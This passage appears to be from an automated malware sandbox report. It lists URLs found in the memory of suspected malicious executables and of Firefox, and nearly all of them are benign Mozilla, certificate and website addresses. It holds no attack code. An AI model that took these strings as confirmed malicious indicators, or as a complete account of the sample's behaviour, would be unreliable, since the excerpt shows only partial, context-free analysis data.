Source: 3e169c0a7e.exe, 00000009.00000003.2932672578.000000000547D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2960129987.0000000005B63000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3073834405.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636894000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 3e169c0a7e.exe, 00000009.00000003.2932672578.000000000547D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2960129987.0000000005B63000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3073834405.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636894000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001D.00000002.3478589092.000001B63D9B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3483013862.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001D.00000002.3434987290.000001B6372FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 0000001D.00000002.3461394505.000001B6385A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3472196282.000001B639509000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3191369944.000001B625DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html.unified-extensions-context-menu-pin-to-toolbarACTIVIT
Source: firefox.exe, 0000001D.00000002.3483013862.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.3370593805.000001B63648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001D.00000002.3483013862.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 0000001D.00000002.3245912168.000001B63158A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001D.00000002.3245912168.000001B631561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 0000001D.00000002.3245912168.000001B63158A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001D.00000002.3245912168.000001B631561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 0000001D.00000002.3245912168.000001B63158A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DF6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3500838579.00002E2071D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3431519653.000001B6371E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001D.00000002.3434987290.000001B6372E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3496249008.000006C56F700000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 0000001D.00000002.3496249008.000006C56F700000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/0
Source: firefox.exe, 0000001D.00000002.3455932042.000001B638295000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3315352593.000001B635503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3479649121.000001B63DA57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3094275279.000001B636530000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3467356104.000001B639345000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3467356104.000001B63932E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3467356104.000001B6393E5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3374956674.000001B636503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3472196282.000001B639519000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3467356104.000001B63930C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3467356104.000001B639322000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3374956674.000001B636520000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3463287311.000001B6386B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3461394505.000001B638503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3374956674.000001B636540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3301079481.000001B635203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3480721237.000001B63DB64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3137638160.000001B63DAD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3455932042.000001B638249000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3365110459.000001B636203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3480721237.000001B63DB7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 0000001D.00000002.3500838579.00002E2071D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/Statu
Source: firefox.exe, 0000001D.00000002.3496249008.000006C56F700000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/Z
Source: 3e169c0a7e.exe, 00000009.00000003.2932672578.000000000547D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2960129987.0000000005B63000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3073834405.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636894000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 3e169c0a7e.exe, 00000009.00000003.2932672578.000000000547D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2960129987.0000000005B63000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3073834405.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636894000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001D.00000003.3097197709.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3330207750.000001B635DDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3097956840.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001D.00000002.3493841696.000001B640348000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B6374D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001D.00000002.3480721237.000001B63DB7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001D.00000002.3493841696.000001B640348000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B6374D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3480721237.000001B63DB7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 0000001D.00000003.3097197709.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3330207750.000001B635DDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3097956840.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001D.00000003.3097197709.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3330207750.000001B635DDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3097956840.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: 3e169c0a7e.exe, 00000009.00000003.3029459573.0000000000D76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2005/app-updateapp.update.checkOnlyInstance.intervalBITS_ACTIVE_NO_PROGRESS_T
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DFCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3489841190.000001B63DF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3452163567.000001B638003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631FB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3463287311.000001B638606000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3452163567.000001B638084000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3368455857.000001B636345000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3398991599.000001B6367B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3457407606.000001B638338000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B63361D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3452163567.000001B6380C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3457407606.000001B638344000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3303944369.000001B635458000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3457407606.000001B638389000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:
Source: firefox.exe, 0000001D.00000002.3457407606.000001B638377000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulbrowser.searchinit.secure_opensearch_en
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulbrowser.searchinit.secure_opensearch_up
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/search/autocom
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/autoco
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/moz-bu
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulname
Source: firefox.exe, 0000001D.00000002.3457407606.000001B638377000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulp
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulprotections-popup-not-blocking-why-etp-
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/TelemetryEnviron
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3586807815.000000001D8E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 3e169c0a7e.exe, 00000009.00000003.2932672578.000000000547D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2960129987.0000000005B63000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3073834405.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B6374D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636894000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3480721237.000001B63DB7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 3e169c0a7e.exe, 00000009.00000003.2932672578.000000000547D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2960129987.0000000005B63000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3073834405.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B6374D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636894000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3480721237.000001B63DB7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001D.00000002.3315352593.000001B6355D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://youtube.com/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DFBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 0000001D.00000003.3067176778.000001B635500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068584412.000001B635782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3067599382.000001B63571E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3348398161.000001B636000000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.3191369944.000001B625DE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068223683.000001B635761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068004981.000001B63573F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: 3e169c0a7e.exe, 00000009.00000003.2900557208.00000000053A9000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900874990.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900671533.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926351246.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2925930815.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926030012.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041989367.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041685223.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041600113.0000000005B19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001D.00000002.3472196282.000001B639533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001D.00000002.3483013862.000001B63DC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 0000001D.00000002.3293412556.000001B634FAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3493841696.000001B640348000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B637480000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3455932042.000001B6382E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3301079481.000001B635203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3293412556.000001B634FDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001D.00000002.3439828011.000001B637480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwderIdLLH7
Source: firefox.exe, 0000001D.00000002.3270733549.000001B6333A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.orgupgradeTabsProgressListenertestPermissionFromPrincipalshowBadgeOnlyNotific
Source: firefox.exe, 0000001D.00000002.3391045339.000001B63660E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636605000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 0000001D.00000002.3497366247.000014FC8A604000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001D.00000002.3315352593.000001B6355D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3472196282.000001B6395B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3489841190.000001B63DF34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001D.00000002.3497366247.000014FC8A604000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://baidu.com
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: 3e169c0a7e.exe, 00000009.00000003.2948054390.000000000540B000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2949019284.000000000540B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0
Source: pisos23.exe, 0000000A.00000003.2961848227.0000000003498000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3084602263.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3245912168.000001B6315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
